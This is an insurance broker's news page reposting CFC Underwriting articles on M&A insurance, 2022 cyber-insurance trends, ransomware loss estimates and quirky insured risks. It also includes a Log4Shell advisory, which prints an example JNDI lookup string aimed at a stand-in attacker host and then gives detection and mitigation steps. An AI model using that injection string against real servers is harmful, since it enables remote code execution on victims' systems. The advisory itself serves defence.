1-888-643-2217 Email ABEX
Keeping you updated

What to Know when your Client is Selling their Business

M&A transactions are complicated and often fraught with risk. As your client looks to you as a trusted advisor during a business sale, what advice can you offer them to make sure they exit with the sale-price proceeds in their pocket?

Here are 4 key things you should know when your SME client is selling their business, and the important role of M&A insurance in facilitating their deal.

The buyer can claim against your client even after the deal closing
During an M&A transaction, SME owners can be mistaken in thinking that their contractual obligations are complete once the deal closes. However, many risks in M&A come after the deal closes and may not arise for a significant amount of time. In fact, a buyer can make a claim against the seller for breach of sale contract up to 6 years after the business has been sold!

If a buyer asserts a breach of a representation or warranty in the sale contract, the seller would be responsible for defense costs, as well as reimbursing the buyer for the loss suffered if the claim is valid or settled.

For some small business sellers who don’t have adequate protection in place, they risk having to hand back some, or all, of their proceeds.

Innocent misrepresentations can damage a deal
One of the biggest risks when it comes to M&A transactions is innocent misrepresentations. An innocent misrepresentation is a statement by the seller that is neither fraudulent nor negligent, but that is still untrue. Often unknowingly. Your client may claim to know their company inside out, but in an evolving and fast-changing regulatory environment, even the most well-intentioned seller can have blind spots. These accidental misrepresentations can still be claimed against after the deal is done and the seller would be responsible.

Existing insurance is unlikely to provide adequate cover
Many SME sellers will have E&O or D&O cover for their businesses, but they can be caught off guard when they learn those policies won’t protect them during the sale of their business. The most common misunderstanding is that D&O policies will cover breach of representation in a sale, which is almost universally untrue.

M&A insurance can really help small deals
A key benefit of M&A insurance is that it provides SME sellers with cover for indemnity and defense costs arising from a claim, giving sellers peace of mind should the worst happen. It can also help the seller negotiate to reduce, or eliminate, their escrow obligations and unlock the sale proceeds immediately after the deal closing. In many cases, M&A insurance can even put the seller in a better negotiating position and enable them to maximize the sale price of their business.

CFC recently launched a first-to-market transaction liability policy created specifically to protect small business sellers in M&A deals.

If you have any questions, please follow the link below.

Source: www.cfcunderwriting.com

Cyber Trends Predicted for 2022

2021 was certainly a time of change for the cyber insurance market and it’s looking like 2022 will be no different.

The cyber threat landscape over the last year has proven to be the most volatile yet in the history of the market, for the simple reason that the risk is too low and the profitability too high for threat actors. As a result, cyber insurers have had to evolve just as quickly to prevent and respond, leading to the following predictions for the year ahead:

Zero-day ransomware attacks
Zero-day ransomware attacks will dominate the headlines, whereby criminals exploit software vulnerabilities before any patches are available to avoid them by businesses. This means that the only way to prevent an attack is through improved security controls in advance.

Fear of a systemic risk event
Third party dependencies will continue to be a weak link for cyber risk. Managed service providers and cloud computing providers will continue to be lucrative targets for cybercriminals, with the fear of the next large-scale systemic risk event – where a single event has the potential to impact thousands of businesses – at the forefront of everyone’s mind.

Cyber insurance = risk management service
Cyber insurance will predominantly become a proactive risk management service. Insurers will seek to prevent claims before they happen and will pivot to conducting scans to detect vulnerabilities as an added service through mobile app technology.

Increased regulatory and governmental scrutiny
Increased scrutiny by both regulators and government advisory groups with a focus on improving security standards for businesses to prevent attacks. Equally, government bodies will seek to ensure there is more transparency around when businesses decide to pay ransom demands through legislation.

Targeting manufacturers and distributors
Criminals will continue to target businesses in industries where standards for security have historically been weak. Manufacturers and distributors have been particularly impacted in the last year given dependencies on automation, robotics, and the supply chain as entryways in their networks.

Continual hardening of the market
As a result, the cyber market is expected to continue to harden with more corrective action taken on rates to ensure the coverage can be maintained as broadly as it has been. Cyber will move from ‘hard to sell’ to ‘hard to buy’ based on limited available capacity, and undoubtedly become where a company’s largest exposure now lies.

So, that’s what CFC thinks will be the most prominent trends hitting the cyber insurance market throughout 2022, but what do you think?


Source: www.cfcunderwriting.com

Log4Shell Vulnerability

Log4Shell (CVE-2021-44228) is a critical vulnerability that has been actively exploited and scanned for by malicious actors since its discovery beginning of December. It enables attackers to run arbitrary code on servers running vulnerable versions of the Apache Log4j 2 library.

What is Log4j 2?

The Log4Shell vulnerability results from how log messages are being handled by the processor in log4j2, an open-source logging service provided by the Apache Group that provides logging for numerous projects. It enables attackers to run arbitrary code on servers running vulnerable versions of the Apache Log4j 2 library.

An attacker can send a specially crafted message, which contains a link to a server they control. For example, they may send a message including the string ${jndi:ldap://evil.xa/x}, where ldap://evil.xa is the attacker-controlled server.

The specially crafted message is passed to the log4j library so it can be logged, but in doing so it queries the malicious server. The malicious server will then respond with directory information, along with whatever code the attacker wants to execute on the victim server. Finally, the victim server downloads this response and executes the code included in the response.

Some of the products known to be using this, and therefore vulnerable to the vulnerability, are:

Apache Druid
Apache Dubbo
Apache Flink
Apache Flume
Apache Hadoop
Apache Kafka
Apache Solr
Apache Spark
Apache Struts
Apache Tapestry
Apache Wicket
Elastic Elasticsearch
Elastic Logstash
Apache Tomcat
Elastic Kibana
JavaServer Faces
Oracle ATG Web Commerce
Spring Framework

Why is this critical?

The vulnerability itself allows an attacker to load arbitrary – potentially malicious – code into the target server. This code might add a backdoor to a server, cryptojack or even carry out a ransomware attack.

The vulnerability was published earlier in December alongside a working proof-of-concept that would enable malicious actors to exploit it.

How to mitigate?

To mitigate against this vulnerability, we recommend installing the latest updates (2.15.0 or later), and the regular and timely updating of any affected third-party software. This should be done on all devices, not only those directly exposed to the internet.

To support the first priority action above, you also should determine if Log4j is installed elsewhere. Java applications can include all the dependent libraries within their installation. To do this, you should undertake a file system search for log4j, searching inside EAR, JAR and WAR files e.g.:

find / -type f -print0 |xargs -n1 -0 zipgrep -i log4j2 2>/dev/null

If a dependency or package manager is used, this can be searched. For example:

dpkg -l | grep log4j

There could be multiple copies of Log4j present and each copy will need to be updated or mitigated.

If updating Log4j 2 is not feasible, this vulnerability can still be mitigated by setting system property “log4j2.formatMsgNoLookups” to “true”. This can be done by restarting the Java service through the use of an argument:

java -Dlog4j2.formatMsgNoLookups=true …

or you can set an Environment Variable for the JVM arguments:


Please contact your IT department with any questions on updates needed.

Source: www.cfcunderwriting.com


How Much Could Ransomware Cost Your Client?

CFC’s new tool helps you find the answer.

Ransomware attacks are a disproportionately expensive type of cyber event, accounting for 81% of all cyber-related losses last year. But how much it costs an individual business depends on their industry sector and size as well as a number of other factors, from how long they were out of action to whether sensitive data was stolen.

Built from data analysis relating to thousands of cyber events handled by CFC, this new tool gives users low, medium, and high severity ransomware loss estimates based on just four simple pieces of business information. It also generates a bespoke, downloadable report explaining the methodology used.

Try it out and help your clients get to grips with the single biggest cyber threat facing their business today.

Click here to enter CFC’s brand new ransomware calculator.

Source: www.cfcunderwriting.com

‘Spooky’ Risks Covered by CFC

Think those of us working in insurance are too boring to celebrate Halloween? Witch, please. Believe it or not, CFC has some serious appetite for spooky risks. From mortality consultants to synthetic humans, they’ll consider more than your bog standard risk! Check out the some of the haunting risks from their healthcare, management liability, professions and tech teams:

Childhood fears

Exposure therapy is designed to help you overcome your deepest and darkest childhood fears. Put on a VR headset that simulates scary clowns chasing you through a funhouse. That’ll sort you out, right?

We provide healthcare, tech and cyber cover (including affirmative bodily injury language arising out of multiple triggers) for digital health exposure therapy companies, all under our eHealth policy.

Hello from the other side

If you’re looking to speak to a loved one who is deceased, a platform now exists to connect consumers with psychics via the telephone or messaging. However, all is well until a client claims to be defrauded by a psychic’s services.

We covered the tech platform under our management liability policy.

Synthetic humans

A medical device manufacturer is developing a synthetic human to be used by hospitals and medical schools to reduce the need for human donors and animals for use in training. A fa-boo-lous idea!

We provided D&O coverage to meet the requirements of the manufacturer’s seed investors.

Modern day grim reaper

Goodbye grim reapers, hello mortality consultants. These professionals develop computer-based models of how long an individual or population is likely to live and the most likely causes of death.

We provided professional liability cover for the mortality consultancy.

Horror games

Not everyone likes to get their fill of thrills, but those who do have probably dabbled in a few of the popular horror games developed by a well-known mobile games developer who we insured.

We provide cover for tech E&O, including contingent BI/PD, cyber and media, as well as excess coverage over D&O for game developers.

Bonus: We did not write that…

As much as we love our extraterrestrial friends, our K&R team had to decline a submission for alien abduction and impregnation. Regrettably, we also did not cover a Sasquatch sighting which caused severe shock and emotional distress.

Source: www.cfcunderwriting.com



Receive notifications of new posts automatically.


Like us on Facebook

Connect with us on LinkedIn